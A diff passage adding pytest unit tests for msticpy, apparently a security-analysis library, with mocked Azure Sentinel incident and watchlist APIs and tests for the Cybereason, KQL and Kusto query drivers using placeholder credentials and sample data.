+@pytest.fixture(scope="module")
+@patch(MicrosoftSentinel.__module__ + ".MicrosoftSentinel.connect")
+def sent_loader(mock_creds):
+    """Generate MicrosoftSentinel for testing."""
+    mock_creds.return_value = None
+    azs = MicrosoftSentinel(
+        sub_id="fd09863b-5cec-4833-ab9c-330ad07b0c1a", res_grp="RG", ws_name="WSName"
+    )
+    azs.connect()
+    azs.token = "fd09863b-5cec-4833-ab9c-330ad07b0c1a"
+    return azs
+
+
+@respx.mock
+def test_sent_incidents(sent_loader):
+    """Test Sentinel incidents feature."""
+    respx.get(re.compile("https://management.azure.com/.*")).respond(
+        200, json=_INCIDENT
+    )
+    incidents = sent_loader.list_incidents()
+    assert isinstance(incidents, pd.DataFrame)
+    assert incidents["name"].iloc[0] == "13ffba29-971c-4d70-9cb4-ddd0ec1bbb84"
+    incident = sent_loader.get_incident(
+        incident="13ffba29-971c-4d70-9cb4-ddd0ec1bbb84",
+    )
+    assert isinstance(incident, pd.DataFrame)
+    assert incident["name"].iloc[0] == "13ffba29-971c-4d70-9cb4-ddd0ec1bbb84"
+
+
+@respx.mock
+def test_sent_updates(sent_loader):
+    """Test Sentinel incident update feature."""
+    respx.put(re.compile("https://management.azure.com/.*")).respond(201, json="")
+    respx.get(re.compile("https://management.azure.com/.*")).respond(
+        200, json=_INCIDENT
+    )
+    sent_loader.post_comment(
+        incident_id="13ffba29-971c-4d70-9cb4-ddd0ec1bbb84", comment="test"
+    )
+
+
+@respx.mock
+def test_sent_comments(sent_loader):
+    """Test Sentinel comments feature."""
+    respx.put(re.compile("https://management.azure.com/.*")).respond(200, json="")
+    respx.get(re.compile("https://management.azure.com/.*")).respond(
+        200, json=_INCIDENT
+    )
+    sent_loader.update_incident(
+        incident_id="13ffba29-971c-4d70-9cb4-ddd0ec1bbb84",
+        update_items={"severity": "High"},
+    )
+
+
+@respx.mock
+def test_sent_entities(sent_loader):
+    """Test getting Entities from a Sentinel Incident."""
+    respx.post(re.compile("https://management.azure.com/.*")).respond(
+        200, json={"entities": [{"kind": "ipv4", "properties": "13.67.128.10"}]}
+    )
+    ents = sent_loader.get_entities("0c7d4a60-46b3-45d0-a966-3b51373faef0")
+    assert isinstance(ents, List)
+    assert ents[0][0] == "ipv4"
+    assert ents[0][1] == "13.67.128.10"
+
+
+@respx.mock
+def test_sent_alerts(sent_loader):
+    """Test getting alerts from a Sentinel Incident."""
+    respx.post(re.compile("https://management.azure.com/.*")).respond(
+        200,
+        json={
+            "value": [
+                {
+                    "properties": {
+                        "systemAlertId": "d8f5e9ab-d75b-42ad-9c01-e350ccfd383a",
+                        "alertDisplayName": "Test Alert",
+                    }
+                }
+            ]
+        },
+    )
+    alerts = sent_loader.get_incident_alerts("0c7d4a60-46b3-45d0-a966-3b51373faef0")
+    assert isinstance(alerts, List)
+    assert alerts[0]["ID"] == "d8f5e9ab-d75b-42ad-9c01-e350ccfd383a"
+    assert alerts[0]["Name"] == "Test Alert"
+
+
+@respx.mock
+def test_sent_comments(sent_loader):
+    """Test getting alerts from a Sentinel Incident."""
+    respx.get(re.compile("https://management.azure.com/.*")).respond(
+        200,
+        json={
+            "value": [
+                {
+                    "properties": {
+                        "message": "Test Message",
+                        "author": {"name": "Test User"},
+                    }
+                }
+            ]
+        },
+    )
+    alerts = sent_loader.get_incident_comments("0c7d4a60-46b3-45d0-a966-3b51373faef0")
+    assert isinstance(alerts, List)
+    assert alerts[0]["Message"] == "Test Message"
+    assert alerts[0]["Author"] == "Test User"
+
+
+@respx.mock
+def test_sent_bookmarks(sent_loader):
+    """Test getting bookmarks from a Sentinel Incident."""
+    respx.get(re.compile("https://management.azure.com/.*/relations")).respond(
+        200,
+        json={
+            "value": [
+                {
+                    "properties": {
+                        "relatedResourceType": "Microsoft.SecurityInsights/Bookmarks",
+                        "relatedResourceName": "508f3c50-f6d3-45b3-8321-fb674afe3478",
+                    }
+                }
+            ]
+        },
+    )
+    respx.get(re.compile("https://management.azure.com/.*/bookmarks")).respond(
+        200,
+        json={
+            "value": [
+                {
+                    "name": "508f3c50-f6d3-45b3-8321-fb674afe3478",
+                    "properties": {"displayName": "Test Bookmark"},
+                }
+            ]
+        },
+    )
+    alerts = sent_loader.get_incident_bookmarks("0c7d4a60-46b3-45d0-a966-3b51373faef0")
+    assert isinstance(alerts, List)
+    assert alerts[0]["Bookmark ID"] == "508f3c50-f6d3-45b3-8321-fb674afe3478"
+    assert alerts[0]["Bookmark Title"] == "Test Bookmark"
+
+
+@respx.mock
+def test_sent_incident_create(sent_loader):
+    respx.put(re.compile("https://management.azure.com/.*")).respond(201)
+    sent_loader.create_incident(title="Test Incident", severity="Low")
diff --git a/tests/data/azure/test_sentinel_watchlists.py b/tests/data/azure/test_sentinel_watchlists.py
new file mode 100644
index 000000000..a3a7ed67b
--- /dev/null
+++ b/tests/data/azure/test_sentinel_watchlists.py
@@ -0,0 +1,166 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Azure Sentinel unit tests."""
+import re
+from unittest.mock import patch
+
+import pandas as pd
+import pytest
+import respx
+from msticpy.data.azure import MicrosoftSentinel
+
+_WATCHLISTS = {
+    "value": [
+        {
+            "id": "subscriptions/123/resourceGroups/RG/providers/Microsoft.OperationalInsights/workspaces/WSNAME/providers/Microsoft.SecurityInsights/Watchlists/watchlist1",
+            "name": "watchlist1",
+            "type": "Microsoft.SecurityInsights/Watchlists",
+            "properties": {
+                "watchlistId": "fc128205-8b8e-482f-8e09-f8220c8fe25d",
+                "displayName": "watchlist1",
+                "provider": "Microsoft",
+                "source": "data.csv",
+                "itemsSearchKey": "IpAddress",
+                "created": "2020-10-05T18:21:05.7786597+00:00",
+                "updated": "2020-10-05T18:21:05.7786597+00:00",
+                "createdBy": {
+                    "objectId": "90a3c369-b812-4f6e-ac76-9fdf8a7e7b4d",
+                    "email": "user@contoso.com",
+                    "name": "A User",
+                },
+                "updatedBy": {
+                    "objectId": "90a3c369-b812-4f6e-ac76-9fdf8a7e7b4d",
+                    "email": "user@contoso.com",
+                    "name": "A User",
+                },
+                "description": "A test watchlist",
+                "watchlistType": "watchlist",
+                "watchlistAlias": "watclist1",
+                "isDeleted": False,
+                "labels": [],
+                "defaultDuration": "P1DT3H",
+                "tenantId": "9b1ac0b8-77aa-4abd-a300-daa4607be7b5",
+                "numberOfLinesToSkip": 0,
+            },
+        },
+    ]
+}
+
+_WATCHLIST_ITEM = {
+    "value": [
+        {
+            "id": "subscriptions/123/resourceGroups/RG/providers/Microsoft.OperationalInsights/workspaces/WSNAME/providers/Microsoft.SecurityInsights/Watchlists/watchlist1/WatchlistItems/a681a611-8a33-41d2-a6b6-3eeaa88fd87d",
+            "name": "a681a611-8a33-41d2-a6b6-3eeaa88fd87d",
+            "etag": '"05003b1a-0000-0a00-0000-5f7b64120000"',
+            "type": "Microsoft.SecurityInsights/Watchlists/WatchlistItems",
+            "properties": {
+                "watchlistItemType": "watchlist-item",
+                "watchlistItemId": "a681a611-8a33-41d2-a6b6-3eeaa88fd87d",
+                "tenantId": "72f988bf-86f1-41af-91ab-2d7cd011db47",
+                "isDeleted": False,
+                "created": "2020-10-05T18:21:05.7786597+00:00",
+                "updated": "2020-10-05T18:21:05.7786597+00:00",
+                "createdBy": {
+                    "objectId": "90a3c369-b812-4f6e-ac76-9fdf8a7e7b4d",
+                    "email": "user@contoso.com",
+                    "name": "A User",
+                },
+                "updatedBy": {
+                    "objectId": "90a3c369-b812-4f6e-ac76-9fdf8a7e7b4d",
+                    "email": "user@contoso.com",
+                    "name": "A User",
+                },
+                "itemsKeyValue": {"Type": "Owned", "IpAddress": "13.67.128.10"},
+                "entityMapping": {},
+            },
+        }
+    ]
+}
+
+
+@pytest.fixture(scope="module")
+@patch(MicrosoftSentinel.__module__ + ".MicrosoftSentinel.connect")
+def sent_loader(mock_creds):
+    """Generate MicrosoftSentinel for testing."""
+    mock_creds.return_value = None
+    sent = MicrosoftSentinel(
+        sub_id="fd09863b-5cec-4833-ab9c-330ad07b0c1a", res_grp="RG", ws_name="WSName"
+    )
+    sent.connect()
+    sent.token = "fd09863b-5cec-4833-ab9c-330ad07b0c1a"
+    return sent
+
+
+@respx.mock
+def test_sent_watchlists(sent_loader):
+    """Test Sentinel Watchlist feature."""
+    respx.get(re.compile("https://management.azure.com/.*")).respond(
+        200, json=_WATCHLISTS
+    )
+    watchlists = sent_loader.list_watchlists()
+    assert isinstance(watchlists, pd.DataFrame)
+    assert watchlists["properties.displayName"].iloc[0] == "watchlist1"
+    assert watchlists["properties.provider"].iloc[0] == "Microsoft"
+
+
+@respx.mock
+def test_sent_watchlists_create(sent_loader):
+    """Test Sentinel Watchlist feature."""
+    respx.put(re.compile("https://management.azure.com/.*")).respond(200)
+    respx.get(re.compile("https://management.azure.com/.*/watchlists")).respond(
+        200, json=_WATCHLISTS
+    )
+    sent_loader.create_watchlist(
+        watchlist_name="Test Watchlist",
+        description="A test watchlist",
+        search_key="testdata",
+    )
+
+
+@respx.mock
+def test_sent_watchlists_delete(sent_loader):
+    """Test Sentinel Watchlist feature."""
+    respx.delete(re.compile("https://management.azure.com/.*")).respond(200)
+    respx.get(re.compile("https://management.azure.com/.*/watchlists")).respond(
+        200, json=_WATCHLISTS
+    )
+    sent_loader.delete_watchlist(watchlist_name="watchlist1")
+
+
+@respx.mock
+def test_sent_watchlists_items(sent_loader):
+    """Test Sentinel Watchlist feature."""
+    respx.get(re.compile("https://management.azure.com/.*/watchlistItems")).respond(
+        200, json=_WATCHLIST_ITEM
+    )
+    watchlist_items = sent_loader.list_watchlist_items(watchlist_name="Test Watchlist")
+    assert isinstance(watchlist_items, pd.DataFrame)
+    assert watchlist_items["properties.itemsKeyValue.Type"].iloc[0] == "Owned"
+    assert (
+        watchlist_items["properties.itemsKeyValue.IpAddress"].iloc[0] == "13.67.128.10"
+    )
+
+
+@respx.mock
+def test_sent_watchlists_items_add(sent_loader):
+    """Test Sentinel Watchlist feature."""
+    respx.get(re.compile("https://management.azure.com/.*/watchlistItems")).respond(
+        200, json=_WATCHLIST_ITEM
+    )
+    respx.put(re.compile("https://management.azure.com/.*/watchlistItems/.*")).respond(
+        200
+    )
+    respx.get(re.compile("https://management.azure.com/.*/watchlists")).respond(
+        200, json=_WATCHLISTS
+    )
+    sent_loader.add_watchlist_item(
+        watchlist_name="watchlist1",
+        item={"Type": "Owned", "IpAddress": "13.67.128.10"},
+        overwrite=True,
+    )
+    sent_loader.add_watchlist_item(
+        watchlist_name="watchlist1", item={"Type": "Owned", "IpAddress": "13.67.128.11"}
+    )
diff --git a/tests/data/browsers/test_mordor_browser.py b/tests/data/browsers/test_mordor_browser.py
new file mode 100644
index 000000000..c7ec575d0
--- /dev/null
+++ b/tests/data/browsers/test_mordor_browser.py
@@ -0,0 +1,59 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Mordor browser notebook test."""
+import os
+from pathlib import Path
+
+import pytest
+import nbformat
+from nbconvert.preprocessors import CellExecutionError, ExecutePreprocessor
+
+__author__ = "Ian Hellen"
+
+_NB_FOLDER = "docs/notebooks"
+_NB_NAME = "MordorData.ipynb"
+
+
+@pytest.mark.skipif(
+    not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
+)
+def test_mordor_browser():
+    """Mordor browser UI Test."""
+    nb_path = Path(_NB_FOLDER).joinpath(_NB_NAME)
+    abs_path = Path(_NB_FOLDER).absolute()
+
+    ex_json = list(abs_path.glob("**/*.json"))
+    ex_zip = list(abs_path.glob("**/*.zip"))
+
+    with open(nb_path) as f_hdl:
+        nbk = nbformat.read(f_hdl, as_version=4)
+    nb_exec = ExecutePreprocessor(timeout=600, kernel_name="python3")
+
+    try:
+        nb_exec.preprocess(nbk, {"metadata": {"path": abs_path}})
+    except CellExecutionError:
+        nb_err = str(nb_path).replace(".ipynb", "-err.ipynb")
+        msg = f"Error executing the notebook '{nb_path}'.\n"
+        msg += f"See notebook '{nb_err}' for the traceback."
+        print(msg)
+        with open(nb_err, mode="w", encoding="utf-8") as f:
+            nbformat.write(nbk, f)
+        raise
+    finally:
+        # Data file cleanup
+        for j_file in abs_path.glob("**/*.json"):
+            if j_file not in ex_json and j_file.is_file():
+                j_file.unlink()
+        for z_file in abs_path.glob("**/*.zip"):
+            if z_file not in ex_zip and z_file.is_file():
+                z_file.unlink()
+        for file in abs_path.joinpath("mordor").glob("*"):
+            file.unlink()
+        # pylint: disable=broad-except
+        try:
+            abs_path.joinpath("mordor").rmdir()
+        except Exception:  # nosec
+            pass
diff --git a/tests/data/browsers/test_query_browser.py b/tests/data/browsers/test_query_browser.py
new file mode 100644
index 000000000..52a548eb1
--- /dev/null
+++ b/tests/data/browsers/test_query_browser.py
@@ -0,0 +1,43 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""test Query browser."""
+from functools import partial
+
+import pytest_check as check
+import pytest
+
+from msticpy.data.query_container import QueryContainer
+from msticpy.data import QueryProvider
+from msticpy.data.browsers.query_browser import _query_display_func
+
+# pylint: disable=redefined-outer-name
+
+
+@pytest.fixture(scope="module")
+def query_prov():
+    """Test fixture to create query provider."""
+    return QueryProvider("LocalData")
+
+
+def test_display_function(query_prov):
+    """Test getting and executing the display function."""
+    disp_func = _query_display_func(query_prov)
+    containers = {
+        name: cont
+        for name, cont in query_prov.__dict__.items()
+        if isinstance(cont, QueryContainer)
+    }
+    for name, container in containers.items():
+        if name == "all_queries":
+            continue
+        for qry_name, qry_obj in container:
+            if isinstance(qry_obj, partial):
+                html = disp_func(f"{name}.{qry_name}")
+                check.is_in(qry_name, html.data)
+                check.is_in("Query", html.data)
+                check.is_in("Parameters", html.data)
+                check.is_in("start=start, end=end, hostname=host", html.data)
+                check.is_in(f"{name}.{qry_name}(", html.data)
diff --git a/tests/data/drivers/__init__.py b/tests/data/drivers/__init__.py
new file mode 100644
index 000000000..6ea13d44c
--- /dev/null
+++ b/tests/data/drivers/__init__.py
@@ -0,0 +1,6 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Init for test package."""
diff --git a/tests/data/drivers/test_cybereason_driver.py b/tests/data/drivers/test_cybereason_driver.py
new file mode 100644
index 000000000..a09e63d00
--- /dev/null
+++ b/tests/data/drivers/test_cybereason_driver.py
@@ -0,0 +1,97 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Miscellaneous data provider driver tests."""
+import re
+
+import respx
+import pandas as pd
+import pytest
+import pytest_check as check
+
+from msticpy.data.drivers.cybereason_driver import CybereasonDriver
+
+from ...unit_test_lib import get_test_data_path, custom_mp_config
+
+
+MP_PATH = str(get_test_data_path().parent.joinpath("msticpyconfig-test.yaml"))
+# pylint: disable=protected-access
+
+_CR_RESULT = {
+    "data": {
+        "resultIdToElementDataMap": {
+            "id1": {
+                "simpleValues": {
+                    "osType": {"totalValues": 1, "values": ["WINDOWS"]},
+                    "totalMemory": {
+                        "totalValues": 1,
+                        "values": ["8589463552"],
+                    },
+                    "group": {
+                        "totalValues": 1,
+                        "values": ["00000000-0000-0000-0000-000000000000"],
+                    },
+                    "osVersionType": {
+                        "totalValues": 1,
+                        "values": ["Windows_10"],
+                    },
+                },
+                "elementValues": {
+                    "users": {
+                        "totalValues": 5,
+                        "elementValues": [],
+                        "totalSuspicious": 0,
+                        "totalMalicious": 0,
+                        "guessedTotal": 0,
+                    }
+                },
+            }
+        }
+    },
+    "status": "SUCCESS",
+    "message": "",
+    "expectedResults": 0,
+    "failures": 0,
+}
+
+
+@pytest.fixture(scope="module", name="driver")
+def cybereason_driver():
+    """Generate Cybereason Driver for testing."""
+    driver = CybereasonDriver()
+    _cr_pre_checks(driver)
+    return driver
+
+
+# Test helper functions for Cybereason tests
+def _cr_pre_checks(driver: CybereasonDriver):
+    check.is_instance(driver, CybereasonDriver)
+    check.is_true(driver._loaded)
+    check.is_false(driver.connected)
+    check.is_false(driver.client.cookies)
+
+
+@respx.mock
+def test_connect(driver):
+    """Test connect."""
+    connect = respx.post(re.compile(r"https://.*.cybereason.net/login.html")).respond(
+        200
+    )
+    with custom_mp_config(MP_PATH):
+        driver.connect()
+        check.is_true(connect.called)
+        check.is_true(driver._connected)
+
+
+@respx.mock
+def test_query(driver):
+    """Test query calling returns data in expected format."""
+    query = respx.post(
+        re.compile(r"https://.*.cybereason.net/rest/visualsearch/query/simple")
+    ).respond(200, json=_CR_RESULT)
+    with custom_mp_config(MP_PATH):
+        data = driver.query('{"test": "test"}')
+        check.is_true(query.called)
+        check.is_instance(data, pd.DataFrame)
diff --git a/tests/data/drivers/test_kql_driver.py b/tests/data/drivers/test_kql_driver.py
new file mode 100644
index 000000000..6002e3de9
--- /dev/null
+++ b/tests/data/drivers/test_kql_driver.py
@@ -0,0 +1,365 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""KQL driver query test class."""
+from contextlib import redirect_stdout
+import io
+from unittest.mock import patch
+
+import pytest
+import pytest_check as check
+import pandas as pd
+
+from adal.adal_error import AdalError
+from Kqlmagic.kql_response import KqlError
+from Kqlmagic.kql_engine import KqlEngineError
+from Kqlmagic.my_aad_helper import AuthenticationError
+
+# from Kqlmagic import kql as kql_exec
+
+from msticpy.data.drivers import kql_driver
+from msticpy.common.exceptions import (
+    MsticpyKqlConnectionError,
+    MsticpyNotConnectedError,
+    MsticpyNoDataSourceError,
+    MsticpyDataQueryError,
+)
+from msticpy.data.drivers import import_driver
+from msticpy.data.query_defns import DataEnvironment
+
+KqlDriver = import_driver(DataEnvironment.AzureSentinel)
+
+# from msticpy.data.drivers.kql_driver import KqlDriver
+GET_IPYTHON_PATCH = KqlDriver.__module__ + ".get_ipython"
+
+
+# pylint: disable=too-many-branches, too-many-return-statements
+# pylint: disable=no-self-use, redefined-outer-name
+
+
+class KqlResultTest:
+    """Test Kql result class."""
+
+    def __init__(self, code=0, partial=False, status="success"):
+        """Create instance."""
+        self.completion_query_info = {"StatusCode": code, "StatusDescription": status}
+        self.is_partial_table = partial
+
+    def to_dataframe(self):
+        """Convert dataframe."""
+        return pd.DataFrame()
+
+
+class _MockIPython:
+    """IPython get_ipython mock."""
+
+    def find_magic(self, magic):
+        """Return None if magic isn't == kql."""
+        if magic == "kql":
+            return "Kqlmagic"
+        return None
+
+    def run_line_magic(self, magic, line):
+        """Mock run line magic."""
+        return self._run_magic(magic, line)
+
+    def run_cell_magic(self, magic, line, cell):
+        """Mock run cell magic."""
+        content = cell or line
+        return self._run_magic(magic, content)
+
+    @staticmethod  # noqa: MC0001
+    def _run_magic(magic, content):
+        if magic == "reload_ext":
+            return None
+        if magic == "config":
+            if "=" in content:
+                return "dummy_setting"
+            return True
+
+        check.equal(magic, "kql")
+        return kql_exec(content)
+
+
+def kql_exec(content):
+    """Mock kql_exec function."""
+    if "--config" in content:
+        if "=" in content:
+            conf_item, conf_value = content.replace("--config", "").strip().split("=")
+            return {conf_item: conf_value}
+        _, conf_item = content.split()
+        return {conf_item: True}
+
+    if "KqlErrorUnk" in content:
+        resp = '{"error": {"code": "UnknownError"}}'
+        raise KqlError(http_response=resp, message=resp)
+    if "KqlErrorWS" in content:
+        resp = '{"error": {"code": "WorkspaceNotFoundError"}}'
+        raise KqlError(http_response=resp, message=resp)
+    if "KqlEngineError" in content:
+        raise KqlEngineError("Test Error")
+    if "AdalErrorUnk" in content:
+        resp = {"error_description": "unknown error"}
+        raise AdalError("Test Error", error_response=resp)
+    if "AdalErrorNR" in content:
+        raise AdalError("Test Error")
+    if "AdalErrorPoll" in content:
+        raise AdalError("Unexpected polling state code_expired")
+    if "AuthenticationError" in content:
+        raise AuthenticationError("Test Error")
+
+    if content == "--schema":
+        return {
+            "table1": {"field1": int, "field2": str},
+            "table2": {"field1": int, "field2": str},
+        }
+
+    if "query_partial" in content:
+        return KqlResultTest(code=0, partial=True, status="partial")
+    if "query_failed" in content:
+        return KqlResultTest(code=1, partial=False, status="failed")
+
+    return KqlResultTest(code=0, partial=False, status="success")
+
+
+KQL_EXEC_PATCH = (kql_driver, "kql_exec", kql_exec)
+
+
+class AzCredentials:
+    """Mock credentials class."""
+
+    class ModernCred:
+        """Mock modern credentials class."""
+
+        class Token:
+            """Mocked token class."""
+
+            token = "Token"
+
+        @classmethod
+        def get_token(cls, *args, **kwargs):
+            """Return the token."""
+            del args, kwargs
+            return cls.Token()
+
+        @property
+        def credentials(self):
+            """Return mocked credentials list."""
+            return ["cred1", "cred2", "cred3"]
+
+    @property
+    def modern(self):
+        """Return the modern credentials."""
+        return self.ModernCred()
+
+
+def az_connect(*args, **kwargs):
+    """Mock the az_connect function."""
+    del args, kwargs
+    return AzCredentials()
+
+
+AZ_CONNECT_PATH = (kql_driver, "az_connect", az_connect)
+
+
+@patch(GET_IPYTHON_PATCH)
+@patch.object(*KQL_EXEC_PATCH)
+@patch.object(*AZ_CONNECT_PATH)
+def test_kql_load(get_ipython):
+    """Check loaded true."""
+    get_ipython.return_value = _MockIPython()
+
+    kql_driver = KqlDriver()
+    check.is_true(kql_driver.loaded)
+
+    kql_driver = KqlDriver(connection_str="la://connection")
+    check.is_true(kql_driver.loaded)
+    check.is_true(kql_driver.connected)
+
+
+@patch(GET_IPYTHON_PATCH)
+@patch.object(*KQL_EXEC_PATCH)
+@patch.object(*AZ_CONNECT_PATH)
+def test_kql_connect(get_ipython):
+    """Check loaded true."""
+    get_ipython.return_value = _MockIPython()
+    kql_driver = KqlDriver()
+    check.is_true(kql_driver.loaded)
+
+    kql_driver.connect(connection_str="la://connection")
+    check.is_true(kql_driver.connected)
+
+
+@patch(GET_IPYTHON_PATCH)
+@patch.object(*KQL_EXEC_PATCH)
+@patch.object(*AZ_CONNECT_PATH)
+def test_kql_connect_no_cs(get_ipython):
+    """Check loaded true."""
+    get_ipython.return_value = _MockIPython()
+    kql_driver = KqlDriver()
+    check.is_true(kql_driver.loaded)
+    with pytest.raises(MsticpyKqlConnectionError) as mp_ex:
+        kql_driver.connect()
+    check.is_in("no connection string", mp_ex.value.args)
+
+
+@patch(GET_IPYTHON_PATCH)
+@patch.object(*KQL_EXEC_PATCH)
+@patch.object(*AZ_CONNECT_PATH)
+def test_kql_connect_kql_exceptions(get_ipython):
+    """Check loaded true."""
+    get_ipython.return_value = _MockIPython()
+    kql_driver = KqlDriver()
+
+    with pytest.raises(MsticpyKqlConnectionError) as mp_ex:
+        kql_driver.connect(connection_str="la://connection+KqlErrorUnk")
+    check.is_in("Kql response error", mp_ex.value.args)
+    check.is_false(kql_driver.connected)
+
+    with pytest.raises(MsticpyKqlConnectionError) as mp_ex:
+        kql_driver.connect(
+            connection_str="la://connection.workspace('1234').tenant(KqlErrorWS)"
+        )
+    check.is_in("unknown workspace", mp_ex.value.args)
+    check.is_false(kql_driver.connected)
+
+    with pytest.raises(MsticpyKqlConnectionError) as mp_ex:
+        kql_driver.connect(
+            connection_str="la://connection.workspace('1234').tenant(KqlEngineError)"
+        )
+    check.is_in("kql connection error", mp_ex.value.args)
+    check.is_false(kql_driver.connected)
+
+
+@patch(GET_IPYTHON_PATCH)
+@patch.object(*KQL_EXEC_PATCH)
+@patch.object(*AZ_CONNECT_PATH)
+def test_kql_connect_adal_exceptions(get_ipython):
+    """Check loaded true."""
+    get_ipython.return_value = _MockIPython()
+    kql_driver = KqlDriver()
+
+    with pytest.raises(MsticpyKqlConnectionError) as mp_ex:
+        kql_driver.connect(connection_str="la://connection+AdalErrorUnk")
+    check.is_in("could not authenticate to tenant", mp_ex.value.args)
+    check.is_false(kql_driver.connected)
+
+    with pytest.raises(MsticpyKqlConnectionError) as mp_ex:
+        kql_driver.connect(connection_str="la://connection+AdalErrorNR")
+    check.is_in("could not authenticate to tenant", mp_ex.value.args)
+    check.is_in("Full error", str(mp_ex.value.args))
+    check.is_false(kql_driver.connected)
+
+    with pytest.raises(MsticpyKqlConnectionError) as mp_ex:
+        kql_driver.connect(connection_str="la://connection+AdalErrorPoll")
+    check.is_in("authentication timed out", mp_ex.value.args)
+    check.is_false(kql_driver.connected)
+
+
+@patch(GET_IPYTHON_PATCH)
+@patch.object(*KQL_EXEC_PATCH)
+@patch.object(*AZ_CONNECT_PATH)
+def test_kql_connect_authn_exceptions(get_ipython):
+    """Check loaded true."""
+    get_ipython.return_value = _MockIPython()
+    kql_driver = KqlDriver()
+
+    with pytest.raises(MsticpyKqlConnectionError) as mp_ex:
+        kql_driver.connect(connection_str="la://connection+AuthenticationError")
+    check.is_in("authentication failed", mp_ex.value.args)
+    check.is_false(kql_driver.connected)
+
+
+@patch(GET_IPYTHON_PATCH)
+@patch.object(*KQL_EXEC_PATCH)
+@patch.object(*AZ_CONNECT_PATH)
+def test_kql_schema(get_ipython):
+    """Check loaded true."""
+    get_ipython.return_value = _MockIPython()
+    kql_driver = KqlDriver()
+    kql_driver.connect(connection_str="la://connection")
+
+    check.is_in("table1", kql_driver.schema)
+    check.is_in("table2", kql_driver.schema)
+    check.is_in("field1", kql_driver.schema["table1"])
+
+
+@patch(GET_IPYTHON_PATCH)
+@patch.object(*KQL_EXEC_PATCH)
+@patch.object(*AZ_CONNECT_PATH)
+def test_kql_query_not_connected(get_ipython):
+    """Check loaded true."""
+    get_ipython.return_value = _MockIPython()
+    kql_driver = KqlDriver()
+
+    with pytest.raises(MsticpyNotConnectedError) as mp_ex:
+        kql_driver.query("test")
+    check.is_in("not connected to a Workspace", mp_ex.value.args)
+    check.is_false(kql_driver.connected)
+
+
+@patch(GET_IPYTHON_PATCH)
+@patch.object(*KQL_EXEC_PATCH)
+@patch.object(*AZ_CONNECT_PATH)
+def test_kql_query_failed(get_ipython):
+    """Check loaded true."""
+    get_ipython.return_value = _MockIPython()
+    kql_driver = KqlDriver()
+    kql_driver.connect(connection_str="la://connection")
+
+    with pytest.raises(MsticpyDataQueryError) as mp_ex:
+        kql_driver.query("test query_failed")
+    arg_str = "\n".join(str(arg) for arg in mp_ex.value.args)
+    check.is_in("Query:", arg_str)
+    check.is_in("test query_failed", arg_str)
+    check.is_in("Query failed", arg_str)
+    check.is_in(
+        "https://msticpy.readthedocs.io/en/latest/DataAcquisition.html", arg_str
+    )
+
+
+@patch(GET_IPYTHON_PATCH)
+@patch.object(*KQL_EXEC_PATCH)
+@patch.object(*AZ_CONNECT_PATH)
+def test_kql_query_success(get_ipython):
+    """Check loaded true."""
+    get_ipython.return_value = _MockIPython()
+    kql_driver = KqlDriver()
+    kql_driver.connect(connection_str="la://connection")
+
+    result_df = kql_driver.query("test query")
+    check.is_instance(result_df, pd.DataFrame)
+
+
+@patch(GET_IPYTHON_PATCH)
+@patch.object(*KQL_EXEC_PATCH)
+@patch.object(*AZ_CONNECT_PATH)
+def test_kql_query_partial(get_ipython):
+    """Check loaded true."""
+    get_ipython.return_value = _MockIPython()
+    kql_driver = KqlDriver()
+    kql_driver.connect(connection_str="la://connection")
+
+    output = io.StringIO()
+    with redirect_stdout(output):
+        result_df = kql_driver.query("test query_partial")
+    check.is_instance(result_df, pd.DataFrame)
+    check.is_in("Warning - query returned partial", output.getvalue())
+
+
+@patch(GET_IPYTHON_PATCH)
+@patch.object(*KQL_EXEC_PATCH)
+@patch.object(*AZ_CONNECT_PATH)
+def test_kql_query_no_table(get_ipython):
+    """Check loaded true."""
+    get_ipython.return_value = _MockIPython()
+    kql_driver = KqlDriver()
+    kql_driver.connect(connection_str="la://connection")
+
+    with pytest.raises(MsticpyNoDataSourceError) as mp_ex:
+        query_source = {"args.table": "table3"}
+        kql_driver.query("test query", query_source=query_source)
+
+    check.is_in("table3 not found.", mp_ex.value.args)
diff --git a/tests/data/drivers/test_kusto_driver.py b/tests/data/drivers/test_kusto_driver.py
new file mode 100644
index 000000000..13d707676
--- /dev/null
+++ b/tests/data/drivers/test_kusto_driver.py
@@ -0,0 +1,249 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Kusto driver unit tests."""
+from unittest.mock import Mock
+import pytest
+import pytest_check as check
+
+from msticpy.common.exceptions import MsticpyUserConfigError, MsticpyParameterError
+from msticpy.data import QueryProvider
+from msticpy.data.drivers.kusto_driver import KustoDriver
+from msticpy.data.drivers.kql_driver import KqlDriver
+
+from ...unit_test_lib import get_test_data_path, custom_mp_config
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name, protected-access
+
+_KUSTO_SETTINGS = """
+DataProviders:
+    Kusto-MSTIC:
+      args:
+        Cluster: https://msticti.kusto.windows.net
+        ClientId: UUID
+        TenantId: UUID
+        ClientSecret: [PLACEHOLDER]
+
+    Kusto-AppAuthCluster:
+      args:
+        Cluster: https://msticapp.kusto.windows.net
+        ClientId: UUID
+        TenantId: UUID
+        ClientSecret: [PLACEHOLDER]
+
+"""
+
+
+@pytest.fixture(scope="module")
+def kusto_qry_prov():
+    """Return query provider with query paths."""
+    qry_path = str(get_test_data_path().joinpath("kusto"))
+    msticpy_config = get_test_data_path().joinpath("msticpyconfig.yaml")
